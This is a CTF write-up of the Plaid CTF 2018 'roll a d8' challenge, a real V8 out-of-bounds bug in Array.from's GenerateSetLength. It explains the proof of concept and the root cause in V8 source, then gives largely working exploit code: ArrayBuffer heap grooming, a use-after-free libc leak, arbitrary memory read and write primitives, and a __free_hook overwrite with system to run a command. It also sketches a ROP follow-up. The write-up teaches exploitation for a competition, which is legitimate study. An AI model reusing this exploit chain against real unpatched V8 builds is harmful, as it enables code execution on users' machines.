roll a d8

0x00 Overview

This is a V8 browser exploitation challenge from Plaid CTF 2018, and is also a real world vulnerability. The vulnerability is an improper array length setting in GenerateSetLength, so the length of array (e.i. array.length) can be higher than real length, which can cause array OOB read and write. We can allocate an ArrayBuffer object behind the OOB array, read kBackingStoreOffset pointer to leak heap address, and write kBackingStoreOffset pointer to achieve arbitrary memory read and write. Finally we can use normal libc exploitation technique to achieve code execution.

0x01 Preparation

Firstly, we need to get the source code of V8. The articles I have read are this and this (in Chinese), but there are also resources online so I will not cover this part in detail. the hash of commit with vulnerability is 1dab065bb4025bdd663ba12e2e976c34c3fa6599, therefore we use the following command to switch to the vulnerable commit.

git reset --hard 1dab065bb4025bdd663ba12e2e976c34c3fa6599
gclient sync

Then we can use this to compile the release version of V8 engine:

tools/dev/v8gen.py x64.relase
ninja -C out.gn/x64.relase d8

After compilation which takes long, there will be a x64.relase directory in out.gn, so that we can use the d8 in this way:

$ ./x64.release/d8
V8 version 6.7.0 (candidate)
d8> var a
undefined

Or we can run the exploit directly:

$ ./x64.release/d8 ./exp.js

0x02 Vulnerability

PoC

Here is the provided proof of concept.

let oobArray = [1.1];
let maxSize = 1028 * 8;
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
  {
    counter : 0,
    next() {
      let result = this.counter++;
      if (this.counter > maxSize) {
        oobArray.length = 1;
        return {done: true};
      } else {
        return {value: result, done: false};
      }
    }
  }
) });
console.log(oobArray)

Firstly let’s see what is Array.from: Array.from().

The Array.from() method creates a new, shallow-copied Array instance from an array-like or iterable object.

console.log(Array.from('foo'));
// expected output: Array ["f", "o", "o"]

console.log(Array.from([1, 2, 3], x => x + x));
// expected output: Array [2, 4, 6]

In PoC, Array.from.call is used instead.

The this pointer is a function function() {return oobArray}. The intuitive idea is that this pointer, which should be Array in normal usage, would be used as constructor to construct return value. In normal usage, new Array will be called, which construct a new instance; while in PoC, new (function() {return oobArray}) will be called, which simply return oobArray according to JavaScript constructor feature.

The first argument in PoC is a customized iterable object. For any iterable object, the property Symbol.iterator should be defined as a function that returns an iterator, and the returned iterator must have a next() method to allow iteration. Maybe an example is more clear.

> Symbol.iterator
Symbol(Symbol.iterator)
> a = [1,2,3]
[ 1, 2, 3 ]
> iter = a[Symbol.iterator]()
{} // return an iterator
> iter.next()
{ value: 1, done: false }
> iter.next()
{ value: 2, done: false }
> iter.next()
{ value: 3, done: false }
> iter.next()
{ value: undefined, done: true }
// when `.next()` is called, 
// field `value` is the value in this iteration,
// field `done` specifies if the iteration is finished.

Another thing to note is that Symbol.iterator is not a string property name as usual, but is a Symbol. I will not detail this here, what we may need to know is that it can be used as property name, just like string. Let’s go back to the challenge. In normal usage, array, which is an iterable object, is passed as argument; but in PoC, a self defined iterable object is passed as argument. Note that {[Symbol.iterator]: something} means we are using Symbol.iterator as property name, not [Symbol.iterator]: the square bracket is just a JavaScript syntax and does not mean array here. In PoC, the iterator is simply an incremental iterator implemented using a counter, the key point is oobArray.length = 1; being executed when iteration is finished, and I will detail why it is here soon. If this line is deleted from PoC, the vulnerability will not be triggered, and the return value will be [0,1,2,...,8221,8222,8223], which shares the exactly same reference as oobArray.

Root Cause

To understand the root cause of this vulnerability, we need to have a look at the source code of Array.from. Array.from is written in CSA. You can read https://v8.dev/blog/csa and https://v8.dev/docs/csa-builtins for more details. In simple words, it is a mechanism that allows developer to write assembly code with some high-level abstraction using C++, although this sounds a bit conflicting.

Here is source code for Array.from with my explanation in comments. A weird thing is that the syntax of CSA here is slightly different from CSA covered in 2 links above, and I am not sure why. Fortunately this does not affect our understanding so much.

// ES #sec-array.from
TF_BUILTIN(ArrayFrom, ArrayPopulatorAssembler) {
    TNode<Context> context = CAST(Parameter(BuiltinDescriptor::kContext));
    //get the context, not really relevant
    TNode<Int32T> argc =
            UncheckedCast<Int32T>(Parameter(BuiltinDescriptor::kArgumentsCount));
    //get the number of arguments, `argc`

    CodeStubArguments args(this, ChangeInt32ToIntPtr(argc));
    //`args` represents all arguments, including `this` 

    TNode<Object> map_function = args.GetOptionalArgumentValue(1);
    //get `mapFn`, in PoC this is simply `undefined`

    {
        Label no_error(this), error(this);
        
        GotoIf(IsUndefined(map_function), &no_error);
        //therfore, this will always jump to label no_error in PoC
        
        GotoIf(TaggedIsSmi(map_function), &error);
        Branch(IsCallable(map_function), &no_error, &error);

        BIND(&error);
        ThrowTypeError(context, MessageTemplate::kCalledNonCallable, map_function);

        BIND(&no_error);
    }

    Label iterable(this), not_iterable(this), finished(this), if_exception(this);

    TNode<Object> this_arg = args.GetOptionalArgumentValue(2);
    // get `thisArg`, which is also undefined and not relevant 
    TNode<Object> items = args.GetOptionalArgumentValue(0);
    TNode<JSReceiver> array_like = ToObject(context, items);
    // get iterable `arrayLike` argument, 
    // which should be the iterable object we passed in PoC

    TVARIABLE(Object, array);
    TVARIABLE(Number, length);
    // create CSA variable using macro
    // I *think* this is similar to `VARIABLE` covered in `csa-builtins` article

    // Determine whether items[Symbol.iterator] is defined:
    IteratorBuiltinsAssembler iterator_assembler(state());
    Node* iterator_method =
            iterator_assembler.GetIteratorMethod(context, array_like);
    // get `arrayLike[Symbol.iterator]`
    Branch(IsNullOrUndefined(iterator_method), &not_iterable, &iterable);
    // jump to label iterable if arrayLike[Symbol.iterator],
    // this will always jump to iterable in PoC

    BIND(&iterable);
    {
        TVARIABLE(Number, index, SmiConstant(0));
        TVARIABLE(Object, var_exception);
        Label loop(this, &index), loop_done(this),
                on_exception(this, Label::kDeferred),
                index_overflow(this, Label::kDeferred);
        // decleare some labels and variables

        {
            Label get_method_not_callable(this, Label::kDeferred), next(this);
            GotoIf(TaggedIsSmi(iterator_method), &get_method_not_callable);
            GotoIfNot(IsCallable(iterator_method), &get_method_not_callable);
            Goto(&next);
            // jump to label get_method_not_callable 
            // if iterator_method is not function (will not occur in PoC)
            // so Goto(&next) will always be executed in PoC

            BIND(&get_method_not_callable);
            ThrowTypeError(context, MessageTemplate::kCalledNonCallable,
                                         iterator_method);

            BIND(&next);
        }

        array = ConstructArrayLike(context, args.GetReceiver());
        // I *think* args.GetReceiver() is used to obtain `this` pointer,
        // and it will be used as a constructor to create an array,
        // (e.g. so `new (function() {return oobArray})` is called for PoC)
        // which is used to store the result and used as return value.
        // In PoC, `array` here will be `oobArray`!

        IteratorRecord iterator_record =
                iterator_assembler.GetIterator(context, items, iterator_method);
        // Call `iterator_method` and get the iterator
        // In PoC, `iterator_record` represent object `{counter: 0, next() {...}}`

        TNode<Context> native_context = LoadNativeContext(context);
        TNode<Object> fast_iterator_result_map =
                LoadContextElement(native_context, Context::ITERATOR_RESULT_MAP_INDEX);
        // some initialization, not very relevant to vulnerability

        Goto(&loop);
        BIND(&loop);
        // iteration loop
        {
            TNode<Object> next = CAST(iterator_assembler.IteratorStep(
                    context, iterator_record, &loop_done, fast_iterator_result_map));
            // In this statement, method `next` will be called
            // if field `done` is true, it will jump to label `loop_done`

            TVARIABLE(Object, value,
                    CAST(iterator_assembler.IteratorValue(
                            context, next, fast_iterator_result_map)));
            // if `done` is false, it will fetch the field `value`,
            // and assign it to variable `value`
            
            {
                Label next(this);
                GotoIf(IsUndefined(map_function), &next);
                // In PoC, there is no `mapFn`, so it will always jump to `next`
                // so codes in this block are not really relevant

                CSA_ASSERT(this, IsCallable(map_function));
                Node* v = CallJS(CodeFactory::Call(isolate()), context, map_function,
                              this_arg, value.value(), index.value());
                GotoIfException(v, &on_exception, &var_exception);
                value = CAST(v);
                Goto(&next);
                BIND(&next);
            }

            Node* define_status =
                    CallRuntime(Runtime::kCreateDataProperty, context, array.value(),
                        index.value(), value.value());
            // same as `array[index] = value`
            GotoIfException(define_status, &on_exception, &var_exception);
            // in PoC there is no exception so this will never jump

            index = NumberInc(index.value());
            // increment index

            CSA_ASSERT_BRANCH(this, [&](Label* ok, Label* not_ok) {
                BranchIfNumberRelationalComparison(Operation::kLessThan, index.value(),
                    NumberConstant(kMaxSafeInteger), ok,not_ok);
            });
            // some assertion, not relevant to vulnerability
            Goto(&loop);
        }

        BIND(&loop_done);
        // end of iteration loop
        {
            length = index; 
            // assign number of iterations to `length`
            Goto(&finished);
            // jump to label `finished`
        }

        BIND(&on_exception);
        {
            ...
            // exception handling, not relevant...
        }
    }

    BIND(&not_iterable);
    {
        ...
        // not relevant...
    }

    BIND(&finished);

    GenerateSetLength(context, array.value(), length.value());
    // Finally set the length on the output and return it.
    // This is the vulnerable function, let's look at it
    args.PopAndReturn(array.value());
    // same as `return array;`
}
void GenerateSetLength(TNode<Context> context, TNode<Object> array,
                         TNode<Number> length) {
    Label fast(this), runtime(this), done(this);
    // Only set the length in this stub if
    // 1) the array has fast elements,
    // 2) the length is writable,
    // 3) the new length is greater than or equal to the old length.

    BranchIfFastJSArray(array, context, &fast, &runtime); // 1)
    // in PoC, array always has fast elements,
    // so it will always jump to label fast
    
    BIND(&fast);
    {
        TNode<JSArray> fast_array = CAST(array);
        TNode<Smi> length_smi = CAST(length);
        // perform some casting

        TNode<Smi> old_length = LoadFastJSArrayLength(fast_array);
        // get length of array (e.i. `old_length = fast_array.length`)
        
        CSA_ASSERT(this, TaggedIsPositiveSmi(old_length));
        // length must be positive

        EnsureArrayLengthWritable(LoadMap(fast_array), &runtime); // 2)
        // length is always writeable in PoC so this will never jump

        GotoIf(SmiLessThan(length_smi, old_length), &runtime); // 3)
        // if length_smi >= old_length, this will not jump.
        // in PoC, old_length == 1,
        // because in the last `next()` method call, length is set to 1
        // (e.i. remember `oobArray.length = 1;` I mentioned above);
        // `length_smi` is number of iteration so it is `1028 * 8`.
        
        StoreObjectFieldNoWriteBarrier(fast_array, JSArray::kLengthOffset,
            length_smi);
        // This writes `length_smi` to the length of array *directly*.
        // Note this is different from `fast_array.length = length_smi`,
        // If the new length is larger than old length here, 
        // new memory will *not* be allocated, 
        // which will cause OOB when this array is accessed later!
        // now the reason why we have `oobArray.length = 1;` is clear:
        // because this can produce the case `length_smi > old_length`,
        // and trigger the vulnerability here!

        Goto(&done);
    }

    BIND(&runtime);
    {
        CallRuntime(Runtime::kSetProperty, context, static_cast<Node*>(array),
                  CodeStubAssembler::LengthStringConstant(), length,
                  SmiConstant(LanguageMode::kStrict));
        Goto(&done);
    }

    BIND(&done);
}

The root cause of vulnerability is also explained in comments. To sum up, after this PoC, we can use oobArray to achieve out-of-bound access.

0x03 Exploitation

Memory Layout of JavaScript Objects

Before exploitation, we may need to understand memory layout of JavaScript Object. Here are some relevant articles: https://v8.dev/blog/fast-properties and http://www.jayconrod.com/posts/52/a-tour-of-v8-object-representation. Here I will only cover structures of objects relevant to exploitation of this challenge.

Floating Point Number Array

What I mean here is array with all elements being floating point numbers, such as [1.1, 2.2, 3.3]. Let’s look at its memory layout.

d8> a = [1.1,2.2,3.3]
[1.1, 2.2, 3.3]
d8> %DebugPrint(a) // need argument --allow-natives-syntax argument
0x3ca3f398d4d9 <JSArray[3]> // <-- inspect this memory
[1.1, 2.2, 3.3]

Press ctrl+c and inspect memory in gdb.

pwndbg> x/10gx 0x3ca3f398d4d9-1
0x3ca3f398d4d8:    0x000009e2d5e02679    0x0000286901c02251
0x3ca3f398d4e8:    0x00003ca3f398d509 <-- inspect this memory     0x0000000300000000
0x3ca3f398d4f8:    0x000028977d884721    0x000000fbae7a70c1
0x3ca3f398d508:    0x000028977d8832d9    0x0000000300000000
0x3ca3f398d518:    0x3ff199999999999a    0x400199999999999a
pwndbg> x/10gx 0x00003ca3f398d509-1
0x3ca3f398d508:    0x000028977d8832d9    0x0000000300000000 <-- length of fast array, 3
0x3ca3f398d518:    0x3ff199999999999a    0x400199999999999a <-- elements in fast array
0x3ca3f398d528:    0x400a666666666666 <-- 1.1 2.2 3.3 in IEEE double    0x000028977d882361
0x3ca3f398d538:    0x0000000200000000    0x0000000000000000
0x3ca3f398d548:    0x000000fbae7a71a1    0x000028977d882361

Here are one point to note: we need -1 for memory addresses, this is because V8 uses least significant bit to specify if the JsObject is an address or a Smi (small integer). Bit 1 means it is an address pointing to a JsObject instance (need to clear this bit to 0 before used as memory address); bit 0 means it is an Smi, whose high 32 bits is used to store the value of integer.

Note that this is the case only when the array can be represented using floating point numbers only. For example, this is the case for [1.1, 2, 3] because 2 and 3 can still be represented using floating point number, but not the case for [1.1, [1.2], {}], because there is array and object inside it. Also, the reason why initial value of oobArray is [1.1] instead of [] is that if it is an empty array initially and integer are pushed into it, the final array will be an smi array instead of a double floating point array.

ArrayBuffer

These pictures should be clearer than any explanation.

So why do we need these structures? The key point is that in ArrayBuffer, the buffer pointer is stored like C. As you can see, the kBackingStoreOffset pointer is on libc heap instead of V8 GC and the least significant bit of this address is 0 instead of 1 unlike other V8 objects. That buffer is a pure C buffer containing only data. Therefore, if we can rewrite this pointer, we can have arbitrary memory read and write, and we can also read the value of pointer kBackingStoreOffset to leak heap address!

Exploitation Idea

Allocate ArrayBuffer using Heap Fengshui

After PoC code is executed, oobArray is now a double floating point array with length longer than actual length. The idea is, if we can put an ArrayBuffer instance behind the floating point fast array, we can read and write the kBackingStoreOffset field of the ArrayBuffer by reading and writing the oobArray. How could we allocate ArrayBuffer just behind the double floating point fast array? The way is to use heap fengshui. Let’s look at the code.

next()
{
    let result = this.counter++;
    if (this.counter > maxSize)
    {
        oobArray.length = 1;
        for (var i = 0; i < 0x1000; i++)
        {
            arrayBuffers.push(new ArrayBuffer(0x2000+i));
        }
        return {done: true};
    }
    else
    {
        return {value: result, done: false};
    }
}

This is the modified version of next function in iterator. After length is set to 1, we tried to allocate 0x1000 ArrayBuffer with different length, and hope to enable an ArrayBuffer to be allocated behind the fast floating point array. Number 0x1000 is found by trial, because by using gdb, we can find that if 0x1000 ArrayBuffer is allocated, the ArrayBuffer will lay just behind the fast array.

Find ArrayBuffer

Okay now we have an array of ArrayBuffer instance, with some of them laying behind the fast array of oobArray and we can read and write their field by using OOB access of oobArray. However, firstly we need to find the offset of ArrayBuffer to fast array of oobArray, namely the index of oobArray; we also need to find which ArrayBuffer it is, namely the index of arrayBuffers.

Before that, we may need a converter to convert double to integer, because the array we are operating on is a floating point array.

const buf8 = new ArrayBuffer(8);
const f64 = new Float64Array(buf8);
const u32 = new Uint32Array(buf8);
function d2u(val)
{ //double ==> Uint64
    f64[0] = val;
    let tmp = Array.from(u32);
    return tmp[1] * 0x100000000 + tmp[0];
}
function u2d(val)
{ //Uint64 ==> double
    let tmp = [];
    tmp[0] = parseInt(val % 0x100000000);
    tmp[1] = parseInt((val - tmp[0]) / 0x100000000);
    u32.set(tmp);
    return f64[0];
}

A interesting point to note is that JavaScript will store integer larger than 2^32 as double floating point number, so if the number is too large, the accuracy will hurts. For example:

d8> tmp = [0xdeadbeef, 0xcafebabe]
[3735928559, 3405691582]
d8> (tmp[1] * 0x100000000 + tmp[0]).toString(16)
"cafebabedeadc000" 

This is because IEEE double floating point number will only use 52 bits to record the fraction, so number with 64-bit fraction cannot be represented by IEEE double floating point number. But fortunately, relevant numbers covered here such as the memory addresses will only have maximum 6 * 8 = 48 bits, so this will not cause problem.

Back to the ArrayBuffer, to find ArrayBuffer, we must know the feature of memory layout of ArrayBuffer.

pwndbg> x/10gx 0x1d39d5c03c19-1
0x1d39d5c03c18:    0x00001ddd40982679    0x00002f12e2402251
0x1d39d5c03c28:    0x00001d39d5c0d661    0x0000202000000000 <-- length = 1028*8 = 0x2020
...
pwndbg> x/40gx 0x00001d39d5c0d661-1+8 // inspect fast array
0x1d39d5c0d668:    0x0000000100000000    0x0000000000000000
0x1d39d5c0d678:    0x00001ddd40983fe9    0x00002f12e2402251
0x1d39d5c0d688:    0x00002f12e2402251    0x0000200000000000 <-- an ArrayBuffer with size 0x2000 
0x1d39d5c0d698:    0x00005573010aff20    0x00005573010aff20 <-- 2 identical pointers
0x1d39d5c0d6a8:    0x0000000000002000 <-- another 0x2000    0x0000000000000004 
....

Therefore, here is the code to find ArrayBuffer in fast array of oobArray:

function find2ArrayBuffer(oobArray)
{
    const inSizeRange = (x) => x >= 0x2000 && x < 0x3000;
    var count = 0;
    var ret = [];
    for (let i = 0; i < oobArray.length; )
    {
        const tmp = d2u(oobArray[i]) / 0x100000000;
        if (inSizeRange(tmp) &&
            oobArray[i + 1] == oobArray[i + 2] &&
            inSizeRange(d2u(oobArray[i + 3])) &&
            tmp == d2u(oobArray[i + 3])) // if match feature of ArrayBuffer
        {
            ret.push({idx: tmp - 0x2000, off : i}); // record `idx` and `off`
            ++count;
            if (count >= 2) // find 2 ArrayBuffer to construct UAF, covered later
                return ret;
            i += 4;
        }
        else
        {
            ++i;
        }
    }
}

The return value of this function is [{"idx":0,"off":4},{"idx":1,"off":14}], if we use console.log(JSON.stringify(jsonAB)) to log it.

Leaking Information

Okay, now we have 2 ArrayBuffer instances, and we know the both their indexes in oobArray and arrayBuffers. We can leak heap address easily.

var heap1 = d2u(oobArray[jsonAB[0].off + 1]);
var heap2 = d2u(oobArray[jsonAB[1].off + 1]);
console.log(heap1.toString(16) + ' ' + heap2.toString(16));

Then we need to leak libc address first. My approach is to construct a UAF. Since we can rewrite any field in ArrayBuffer, we can rewrite pointer in one ArrayBuffer to the pointer in another ArrayBuffer. Then delete one of the ArrayBuffer by removing all references to it, and trigger garbage collection, so the buffer is freed. However, the buffer is still used by another ArrayBuffer, and if fd or bk points to somewhere in main_arena, we can leak the libc address by reading that ArrayBuffer. Here is the codes:

oobArray[jsonAB[1].off + 1] = oobArray[jsonAB[0].off + 1];
oobArray[jsonAB[1].off + 2] = oobArray[jsonAB[0].off + 2];
//rewrite the pointer to the same buffer to construct UAF
//there are 2 pointers with same value so rewrite both of them
for (var i = 0; i < arrayBuffers.length; i++)
{// deleting all other arrayBuffers are also choice made by trial
    if (i != jsonAB[0].idx)
        arrayBuffers[i] = undefined;
}
for (var i = 0; i < 0x1000; i++)
{ // 0x1000 is also obtained by trial
    arrayBuffers.push(new ArrayBuffer(0x2010));
}
//delete referece and trigger GC

Now the pointer in arrayBuffer[jsonAB[1].idx], which is also pointer in arrayBuffer[jsonAB[1].idx], is freed, and it is in unsorted bin, so we can read the libc address by reading fd pointer. Note that, I made it end up in this way by trials. If you change 0x1000 to something else, for example, it might not end up in this way.

By reading this buffer, libc address can be obtained.

const tmp = new Float64Array(arrayBuffers[jsonAB[0].idx], 0, 8);
var libcAddr = d2u(tmp[0]);
libcAddr -= 0x3ec340
console.log(libcAddr.toString(16));

Arbitrary Read and Write

Now we have libc address, the next idea is to rewrite __free_hook to system and execute arbitrary bash command, but before that, we may want to implement the function that achieve arbitrary read and write.

function memRead(addr)
{
    oobArray[jsonAB[0].off + 1] = u2d(addr);
    oobArray[jsonAB[0].off + 2] = u2d(addr);
    const tmp = new Float64Array(arrayBuffers[jsonAB[0].idx], 0, 8);
    return d2u(tmp[0]);
}
function memWrite(addr, val)
{
    oobArray[jsonAB[0].off + 1] = u2d(addr);
    oobArray[jsonAB[0].off + 2] = u2d(addr);
    const tmp = new Float64Array(arrayBuffers[jsonAB[0].idx], 0, 8);
    tmp[0] = u2d(val);
}

Arbitrary Code Execution

Finally, pop up the calculator in this way:

memWrite(libcAddr + 0x3ed8e8, libcAddr + 0x4f440); // free hook
const binsh = new Uint32Array(new ArrayBuffer(0x30));
cmd = [1634628399, 1768042352, 1852256110, 761621871, 1668047203, 1952541813, 29295];
// "/snap/bin/gnome-calculator"
for (var i = 0; i < cmd.length; i++)
    binsh[i] = cmd[i];

When the program terminates, all ArrayBuffer will be freed, so system("/snap/bin/gnome-calculator") will be executed. You can also trigger the garbage collection to free the buffer, which is same as the approach mentioned above.

Others

If you want to execute the shellcode, we may need to use ROP to call mprotect on heap page and jump to that memory, which is just normal Linux exploitation and not very related to V8, so I will not cover it here. The way to construct ROP is writing on the stack (we can leak stack address by environ symbol in libc) and to use add rsp,xxx; ret; gadget to jump to ROP chain. We need to make xxx quite big to make sure memory to write ROP is in memory region of functions underneath so it will not affect or be affected by JavaScript execution. We can also spray the stack a bit and fill it with address of ret to make sure ROP will be executed.

Also, although in the provided version of V8, JIT page is not rwx (and this is the reason why I use glibc exploitation), but it seems that web assembly will produce rwx. I will investigate this in the future.

The full exploit is here.